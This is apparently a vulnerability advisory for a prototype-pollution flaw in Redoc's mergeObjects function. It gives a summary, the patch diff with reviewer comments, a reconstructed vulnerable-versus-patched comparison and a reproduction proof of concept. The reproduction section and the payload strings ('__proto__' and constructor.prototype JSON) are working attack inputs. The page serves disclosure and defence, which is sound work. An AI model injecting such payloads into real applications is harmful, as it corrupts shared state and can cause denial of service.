VYPR
High severity · NVD Advisory · Published Mar 28, 2025 · Updated Apr 1, 2025

CVE-2024-57083

Description

A prototype pollution vulnerability in Redoc's mergeObjects function allows attackers to cause a Denial of Service by supplying a crafted payload.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Vulnerability

Overview

A prototype pollution vulnerability exists in the mergeObjects function (exported from src/utils/helpers.ts) in Redoc versions up to 2.2.0; the GitHub Security Advisory lists every version below 2.4.0 as affected. The function recursively copies properties from a source object into a destination object without sanitizing special keys such as __proto__ or constructor.prototype. Because target['__proto__'] resolves to Object.prototype, a recursion into that key writes the attacker's properties onto the global Object.prototype, polluting the prototype chain of every ordinary object in the process [2][3].

Exploitation

An attacker can exploit this by supplying a crafted JSON payload containing a __proto__ property to any Redoc instance that processes user-controlled OpenAPI definitions. The provided proof-of-concept demonstrates that after calling mergeObjects with a malicious object, the polluted property becomes accessible on all objects [3]. No authentication is required if the application exposes Redoc to untrusted input.

Impact

While the CVE description notes a Denial of Service (DoS) impact, the issue report indicates that prototype pollution in this context can lead to more severe consequences, including remote code execution (RCE) and cross-site scripting (XSS), depending on how the polluted properties are consumed by the application, for example when option or template lookups fall through to Object.prototype and pick up attacker-controlled values [3].

Mitigation

The vulnerability has been addressed in pull request #2638, which skips the __proto__ key when copying properties [4]; the committed diff filters only __proto__ and does not special-case constructor. Users should update to Redoc 2.4.0 or later, the patched version listed in the GitHub Security Advisory. No official workaround has been provided; until the upgrade is in place, OpenAPI definitions fed to Redoc should come only from trusted sources.

AI Insight generated on May 20, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

Package        Affected versions   Patched versions
redoc (npm)    < 2.4.0             2.4.0

Affected products

2

Patches

1
153ec7a0b724

fix: Prototype Pollution Vulnerability Affecting redoc <=2.2.0 (#2638)

https://github.com/Redocly/redoc · Lucas Akira Uehara · Jan 28, 2025 · via ghsa-ref
2 files changed · +32 −7
  • src/utils/helpers.ts (+8 −7, modified)
    @@ -81,7 +81,6 @@ export function appendToMdHeading(md: string, heading: string, content: string)
       }
     }
     
    -// credits https://stackoverflow.com/a/46973278/1749888
     export const mergeObjects = (target: any, ...sources: any[]): any => {
       if (!sources.length) {
         return target;
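Review bot: the removed `// credits https://stackoverflow.com/a/46973278/1749888` line is unrelated to the security fix, and the recursive merge that follows it is still the same code the credit referred to; keep the attribution (or move it into the commit message) rather than dropping it silently as part of a vulnerability patch.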
    @@ -93,13 +92,15 @@ export const mergeObjects = (target: any, ...sources: any[]): any => {
     
       if (isMergebleObject(target) && isMergebleObject(source)) {
         Object.keys(source).forEach((key: string) => {
    -      if (isMergebleObject(source[key])) {
    -        if (!target[key]) {
    -          target[key] = {};
    +      if (Object.prototype.hasOwnProperty.call(source, key) && key !== '__proto__') {
    +        if (isMergebleObject(source[key])) {
    +          if (!target[key]) {
    +            target[key] = {};
    +          }
    +          mergeObjects(target[key], source[key]);
    +        } else {
    +          target[key] = source[key];
             }
    -        mergeObjects(target[key], source[key]);
    -      } else {
    -        target[key] = source[key];
           }
         });
       }
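Review bot: the new guard `key !== '__proto__'` filters only one of the keys that can reach a prototype; `constructor` and `prototype` still pass through the same recursion, and whether a `{"constructor":{"prototype":{...}}}` payload is stopped depends on `isMergebleObject` rejecting the `Object` function, which is not visible in this hunk. Suggest an explicit deny list, e.g. `const DENIED = new Set(['__proto__', 'constructor', 'prototype']);` and `if (Object.prototype.hasOwnProperty.call(source, key) && !DENIED.has(key)) {`. Separately, `Object.keys(source)` already yields only own enumerable properties, so the added `hasOwnProperty` check is redundant; harmless, but worth a comment so nobody mistakes it for the operative guard.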
    
  • src/utils/__tests__/helpers.test.ts (+24 −0, modified)
    @@ -71,6 +71,30 @@ describe('Utils', () => {
             const obj2 = { a: ['C'], b: ['D'] };
             expect(mergeObjects({}, obj1, obj2)).toEqual({ a: ['C'], b: ['D'] });
           });
    +      test('should prevent prototype pollution', () => {
    +        const target = {};
    +        const source = JSON.parse('{"__proto__": {"polluted": "yes"}}');
    +
    +        mergeObjects(target, source);
    +
    +        expect(({} as any).polluted).toBeUndefined();
    +      });
    +      test('should merge objects correctly', () => {
    +        const target = { a: 1 };
    +        const source = { b: 2 };
    +
    +        const result = mergeObjects(target, source);
    +
    +        expect(result).toEqual({ a: 1, b: 2 });
    +      });
    +      test('should handle nested objects', () => {
    +        const target = { a: { b: 1 } };
    +        const source = { a: { c: 2 } };
    +
    +        const result = mergeObjects(target, source);
    +
    +        expect(result).toEqual({ a: { b: 1, c: 2 } });
    +      });
         });
     
         describe('titleize', () => {
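Review bot: `should prevent prototype pollution` exercises only a top-level `"__proto__"` key; add a nested case such as `{"a":{"__proto__":{"polluted":"yes"}}}` and a `{"constructor":{"prototype":{"polluted":"yes"}}}` case so the other routes are covered, and add an `afterEach` that deletes `(Object.prototype as any).polluted`, otherwise a failing run leaves the prototype polluted for every test that follows.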
    

Vulnerability mechanics

Root cause

"Missing filtering of `__proto__` key in `mergeObjects` allows recursive copy of properties onto `Object.prototype`."

Attack vector

An attacker supplies a crafted JSON payload containing a `__proto__` key (e.g., `{"__proto__":{"polluted":true}}`) to the `mergeObjects` function [ref_id=2]. Because the function lacks a check for `__proto__` or `constructor.prototype`, and `target['__proto__']` resolves to `Object.prototype`, the recursive copy writes the malicious property onto `Object.prototype`, so every object that inherits from it sees the injected value [CWE-1321]. This can lead to Denial of Service (DoS) by corrupting object behavior across the application [ref_id=2].

Affected code

The vulnerability resides in the `mergeObjects` function in `src/utils/helpers.ts` (bundled as `redoc/bundles/redoc.lib.js`). The function recursively copies source properties to a target object without filtering dangerous keys like `__proto__` [ref_id=2].

What the fix does

The patch adds two guards inside the `Object.keys(source).forEach` loop in `mergeObjects` [patch_id=1640037]. First, it checks `Object.prototype.hasOwnProperty.call(source, key)` so that only the source's own properties are copied; since `Object.keys` already returns only own enumerable keys, this check is defensive rather than decisive. Second, it explicitly skips the key `__proto__` with `key !== '__proto__'` [patch_id=1640037]. The second guard is what closes the hole: without it, `target['__proto__']` resolves to `Object.prototype` and the recursive call writes the attacker's properties onto it. Note that the guard names only `__proto__`; `constructor` and `prototype` keys are not filtered, so the fix depends on the (unshown) `isMergebleObject` helper never treating a function such as `target.constructor` as a mergeable object.
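To make the Overview and the description of the fix concrete, here is an added, stand-alone example (not Redoc's source and not part of this advisory): the pre-patch and post-patch `mergeObjects` logic reconstructed from the diff, built from one factory so the variants differ only in the key filter, plus a harness that reports whether a merge call polluted `Object.prototype`. Assumed rather than taken from the page: the `isMergebleObject` helper (treated as "non-null, non-array object"), the `source === undefined` early return, the names `makeMerge` and `pollutes`, and the hardened deny-list variant, which goes beyond the shipped fix.

```javascript
// Added example (not Redoc's source): pre-patch and post-patch mergeObjects
// logic reconstructed from the fix diff, plus a harness that detects pollution
// of Object.prototype. Runs stand-alone under Node; no redoc install needed.

// Assumed helper: isMergebleObject is not shown in the diff. This version
// treats any non-null, non-array object as mergeable (functions are not).
const isMergebleObject = (item) =>
  item !== null && typeof item === 'object' && !Array.isArray(item);

// Factory (assumed name): builds the recursive deep-merge from the diff; the
// three variants below differ only in the key filter, exactly where the fix did.
function makeMerge(keyAllowed) {
  const merge = (target, ...sources) => {
    if (!sources.length) return target;
    const source = sources.shift();
    if (source === undefined) return target; // assumed early return
    if (isMergebleObject(target) && isMergebleObject(source)) {
      Object.keys(source).forEach((key) => {
        if (!keyAllowed(source, key)) return;
        if (isMergebleObject(source[key])) {
          // When key is "__proto__", target[key] resolves to Object.prototype,
          // so an unfiltered recursion writes straight onto the shared prototype.
          if (!target[key]) target[key] = {};
          merge(target[key], source[key]);
        } else {
          target[key] = source[key];
        }
      });
    }
    return merge(target, ...sources);
  };
  return merge;
}

// Pre-patch behaviour (the "-" lines of the fix): every key is copied.
const mergeObjectsVulnerable = makeMerge(() => true);

// Post-patch behaviour (the "+" lines of the fix): own-property check plus an
// explicit skip of "__proto__".
const mergeObjectsPatched = makeMerge(
  (source, key) =>
    Object.prototype.hasOwnProperty.call(source, key) && key !== '__proto__',
);

// Defence-in-depth variant (suggestion, not part of the Redoc patch): also
// refuse the keys that could reach a prototype through the constructor.
const DENIED_KEYS = new Set(['__proto__', 'constructor', 'prototype']);
const mergeObjectsHardened = makeMerge(
  (source, key) =>
    Object.prototype.hasOwnProperty.call(source, key) && !DENIED_KEYS.has(key),
);

// Harness (assumed name): merge attacker-controlled JSON into a fresh target and
// report whether an unrelated object, created beforehand, acquired the injected
// property. Object.prototype is restored afterwards so later code is unaffected.
function pollutes(merge, payloadJson) {
  const attackerInput = JSON.parse(payloadJson); // own key named "__proto__", not a prototype
  const victim = {};                              // never passed to merge
  try {
    merge({}, attackerInput);
  } catch (e) {
    // a thrown error would not undo writes already made to Object.prototype
  }
  const onPrototype = Object.prototype.hasOwnProperty.call(Object.prototype, 'polluted');
  const seenByVictim = victim.polluted === true;
  delete Object.prototype.polluted;
  return onPrototype && seenByVictim;
}

// Constructed payloads: the advisory's shape, and the constructor.prototype route.
const PAYLOAD = '{"__proto__":{"polluted":true}}';
const CTOR_PAYLOAD = '{"constructor":{"prototype":{"polluted":true}}}';

// Stand-alone run: node pollution-check.js
if (typeof require !== 'undefined' && require.main === module) {
  console.log('vulnerable merge, __proto__ payload:', pollutes(mergeObjectsVulnerable, PAYLOAD)); // true
  console.log('patched merge,    __proto__ payload:', pollutes(mergeObjectsPatched, PAYLOAD));    // false
  console.log('hardened merge,   __proto__ payload:', pollutes(mergeObjectsHardened, PAYLOAD));   // false
  console.log('vulnerable merge, constructor route:', pollutes(mergeObjectsVulnerable, CTOR_PAYLOAD)); // false
}
```

With the assumed `isMergebleObject`, the constructor route stops on its own: `target.constructor` is the `Object` function, which is not a mergeable object, so the recursion never reaches `prototype`. The deny list in the hardened variant exists so that this property does not depend on a helper defined elsewhere in the file.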

Preconditions

  • input: The application must call mergeObjects() with attacker-controlled input (e.g., parsed JSON)
  • auth: No authentication required; the attack can be triggered by any user who can supply a crafted payload to the mergeObjects function

Reproduction

```js
(async () => {
  // Load the published package; the PoC calls mergeObjects through its exports.
  const lib = await import('redoc');
  // JSON.parse yields an own property literally named "__proto__" (it does not set the prototype).
  const BAD_JSON = JSON.parse('{"__proto__":{"polluted":true}}');
  // An unrelated object created before the merge; it is never passed to mergeObjects.
  const victim = {};
  console.log('Before Attack: ', JSON.stringify(victim.__proto__));
  try {
    lib.mergeObjects({}, BAD_JSON);
  } catch (e) {
    // an exception here does not undo writes already made to Object.prototype
  }
  console.log('After Attack: ', JSON.stringify(victim.__proto__));
  // Clean up the shared prototype so the rest of the process is unaffected.
  delete Object.prototype.polluted;
})();
```
[ref_id=2]

Generated on May 23, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

4
